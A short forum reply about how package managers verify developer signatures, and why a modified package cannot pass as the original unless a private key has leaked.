Re: "Loads of ways"
> Who checks dev certificates
Your package manager. Every package manager which expects signed code has a mechanism for telling it which signatures are acceptable for which packages/repositories.
I imagine the chief difference from today's centralised systems would be that a change in ownership of a package would be an explicit action every package consumer would have to make (accepting the new dev's signing key for that package), rather than delegating that decision to the controllers of the repository.
> How difficult is, for example, take package X, modify it, re-sing it with a valid dev certificate and distribute it from a local node repository?
Trivial. It's called "creating a new package".
But how difficult is it to take that package, modify it, re-sign it with a certificate people trust, and pass it off as the same package from the same source as before?
Barring a disclosed private key, practically impossible.